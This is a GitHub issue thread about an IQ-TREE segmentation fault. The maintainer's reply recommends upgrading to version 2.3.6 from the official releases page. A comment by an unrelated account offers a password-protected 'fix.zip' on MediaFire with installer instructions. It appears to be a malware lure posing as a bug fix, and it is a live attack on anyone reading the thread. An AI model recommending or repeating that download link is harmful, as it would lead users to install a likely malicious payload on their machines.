### ISSUE TITLE
IQ-TREE CRASHES WITH SIGNAL SEGMENTATION FAULT

### ISSUE THREAD

**Issue by z626093820** [iqtree/iqtree2#307]
When I run the command below, the following error occurs.

iqtree2 -m MFP -B 1000 -alrt 1000 -T AUTO --prefix tree -s mafft2-trim.aln-fasta

ERROR:
ERROR: *** IQ-TREE CRASHES WITH SIGNAL SEGMENTATION FAULT
ERROR: *** For bug report please send to developers:
ERROR: ***    Log file: tree.log
ERROR: ***    
Alignment files (if possible)
[tree.log](https://github.com/user-attachments/files/16745532/tree.log)

[mafft2-trim.aln-fasta.txt](https://github.com/user-attachments/files/16745542/mafft2-trim.aln-fasta.txt)

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by thomaskf** [comment]
Hi,
Sorry for the late reply. I saw you were using version 2.2.2.2
By using the latest version 2.3.6, IQTREE can run on your data using the same command without any problem.
Please download and use the latest version of IQTREE from https://github.com/iqtree/iqtree2/releases .
Thanks.
Thomas
